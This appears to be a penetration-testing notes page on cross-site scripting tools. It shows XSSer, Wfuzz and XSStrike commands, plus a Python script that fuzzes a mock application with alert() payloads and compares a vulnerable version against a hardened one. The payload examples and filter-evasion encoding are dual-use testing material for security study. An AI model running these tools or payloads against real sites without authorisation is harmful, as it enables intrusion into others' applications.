# Cross-Site Scripting (XSS)

## XSSER

XSSer is an automated framework for detecting and exploiting XSS. Give it the target with `-u`, add `--auto` to have it inject its built-in list of vectors, and pass a session cookie with `--cookie` so that authenticated pages can be tested. Quote the URL so the shell does not interpret `?` and `&`.

```
xsser -u "<URL>" --auto --cookie="<COOKIE>"
```

## WFUZZ

Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL injections, hidden directories, form parameters, and more. It is included in Kali by default.

Basic usage of Wfuzz consists of giving it a payload source with the **-z** flag (here `file,<path>`: the `file` payload type followed by the path of a wordlist of XSS payloads) and the URL to test, with the value of the parameter under test replaced by the keyword **FUZZ**. The **-c** flag colours the output. Quote the URL so the shell does not interpret the `?` and `&` characters.

```
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt "http://domain.com/application/index.php?page=FUZZ"
```
```

Also of use, when fuzzing an application that returns many different response codes, the **--hc** flag hides responses with the given status codes (for example `--hc 404`, or `--hc 404,403` for several), so that only the interesting responses remain in the output. The related **--hl**, **--hw** and **--hh** flags hide responses by line, word and character count, which is the usual way to filter out a generic error page that always comes back with a 200.

Another helpful feature of Wfuzz is the ability to encode payloads. Encoding helps get them past defensive filters, and it also keeps characters such as `#`, `&` and spaces from being interpreted as URL syntax instead of reaching the application as part of the parameter value.

Simply append the desired encoder (in this case `urlencode`) to the payload specification, separated by a comma, to encode every payload before it is sent. `wfuzz -e encoders` lists the encoders available.

```
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode "http://domain.com/application/index.php?page=FUZZ"
```
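To make the workflow above concrete, here is an added Python example (not Wfuzz's own code and not from the original page) that does by hand what the commands do: it substitutes each payload from a wordlist for `FUZZ` in the URL template, optionally URL-encodes it, drops responses whose status code is in a hide list (the role of `--hc`), and records whether the raw payload came back unmodified in the body, which is the triage step a tester performs on Wfuzz output. The target is a hypothetical in-process application, with a naive filter in front of it, in a vulnerable and a hardened variant; the payload list is constructed here rather than read from the Wfuzz wordlist, so the script runs offline.

```python
"""Minimal reflected-XSS fuzzer modelled on the wfuzz workflow above.

Added example, not wfuzz's code: an in-process stand-in application replaces the
real target (http://domain.com/application/index.php?page=FUZZ) so that the
script runs offline and deterministically.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload list, standing in for /usr/share/wfuzz/wordlist/Injections/XSS.txt
PAYLOADS = [
    '<script>alert(1)</script>',            # rejected by the naive filter below
    '"><img src=x onerror=alert(1)>',       # breaks out of an attribute
    "'-alert(1)-'",                         # JavaScript-string context
    '<a href="#" onclick=alert(1)>x</a>',   # contains '#', which must be URL-encoded
]

# The URL template exactly as it would be given to wfuzz, FUZZ marking the injection point.
TEMPLATE = "http://domain.com/application/index.php?page=FUZZ"


def urlencode(payload):
    """Percent-encode every reserved character, as the ',urlencode' encoder does."""
    return quote(payload, safe="")


def _serve(url, escape):
    """Hypothetical target application (not a real site). Returns (status, body).

    A naive filter in front of it rejects anything containing '<script' with a
    403, so that --hc style hiding has something to hide. With escape=False the
    'page' value is reflected raw (vulnerable); with escape=True it is
    HTML-escaped first (hardened).
    """
    params = parse_qs(urlsplit(url).query)   # parse_qs percent-decodes the values
    page = params.get("page", [""])[0]
    if not page:
        return 404, "<h1>Not found</h1>"
    if "<script" in page.lower():
        return 403, "<h1>Request blocked</h1>"
    shown = html.escape(page, quote=True) if escape else page
    return 200, f"<html><body><h1>Page: {shown}</h1></body></html>"


def vulnerable_app(url):
    return _serve(url, escape=False)


def hardened_app(url):
    return _serve(url, escape=True)


def fuzz(app, template, payloads, encoder=None, hide_codes=()):
    """Send every payload through the template, optionally encoded.

    hide_codes plays the role of wfuzz's --hc: responses with those status
    codes are dropped. For the rest, 'reflected' records whether the raw
    payload appears unmodified in the response body.
    """
    results = []
    for payload in payloads:
        sent = encoder(payload) if encoder else payload
        status, body = app(template.replace("FUZZ", sent))
        if status in hide_codes:
            continue
        results.append({"payload": payload, "status": status,
                        "chars": len(body), "reflected": payload in body})
    return results


if __name__ == "__main__":
    for label, enc in (("raw", None), ("urlencoded", urlencode)):
        print(f"== vulnerable target, {label} payloads, hiding 403 ==")
        for r in fuzz(vulnerable_app, TEMPLATE, PAYLOADS, encoder=enc, hide_codes=(403,)):
            print(f"{r['status']}  {r['chars']:4d} Ch  reflected={r['reflected']!s:5}  {r['payload']}")
    print("== hardened target, urlencoded payloads ==")
    for r in fuzz(hardened_app, TEMPLATE, PAYLOADS, encoder=urlencode):
        print(f"{r['status']}  {r['chars']:4d} Ch  reflected={r['reflected']!s:5}  {r['payload']}")
```

Run without an encoder, the fourth payload never reaches the application intact: the `#` is parsed as the start of the URL fragment and the parameter is truncated, so the reflection check fails even though the page is vulnerable. With `urlencode` all three payloads that get past the filter are reported as reflected against the vulnerable variant, and none against the hardened one, which escapes `<`, `>`, `"` and `'` before echoing the value.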

## XSStrike

XSStrike is a dedicated suite for detecting cross-site scripting vulnerabilities. It includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and more. The project describes itself as currently in beta.

{% code overflow="wrap" lineNumbers="true" fullWidth="true" %}

```bash
git clone https://github.com/s0md3v/XSStrike

cd XSStrike
pip3 install -r requirements.txt
```

{% endcode %}

This tool begins by checking for DOM-based XSS vulnerabilities, and the potentially vulnerable parameters are displayed on the screen. Reflected XSS is tested for next, and the interactive payload generator displays the payload and the projected likelihood of success. To continue scanning, hit **y** at the prompt.

### Scan a single URL

Option: `-u` or `--url`. Tests a single page whose parameters are passed in the query string (GET).

{% code overflow="wrap" lineNumbers="true" fullWidth="true" %}

```bash
python xsstrike.py -u "http://example.com/search.php?q=query"
```

{% endcode %}

### Supply POST data

Option: `--data`. The parameters are sent in the request body (POST) instead of the query string.

{% code overflow="wrap" lineNumbers="true" fullWidth="true" %}

```bash
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
```

{% endcode %}

### Supply HTTP headers

Option: `--headers`. Used on its own, this option opens your text editor (nano by default); paste your HTTP headers and press `Ctrl + S` to save (or `Ctrl + O` followed by `Ctrl + X` on versions of nano without `Ctrl + S`).

<figure><img src="https://532189072-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Lt8335BPUBXjq3iC572%2Fuploads%2FZbEfqhzij8nmrFZ2DUQq%2Fimage.png?alt=media&#x26;token=f9650dc1-4158-4aa8-8f4f-a463aeeca7a0" alt=""><figcaption></figcaption></figure>

If your operating system doesn't support this, or you would rather not use an editor, you can pass the headers directly on the command line as the value of `--headers`, separated by a literal `\n`, as follows:

{% code overflow="wrap" lineNumbers="true" fullWidth="false" %}

```bash
python xsstrike.py -u "http://example.com/page.php?q=query" --headers "Accept-Language: en-US\nCookie: null" --file-log-level DEBUG --log-file output.log
```

{% endcode %}

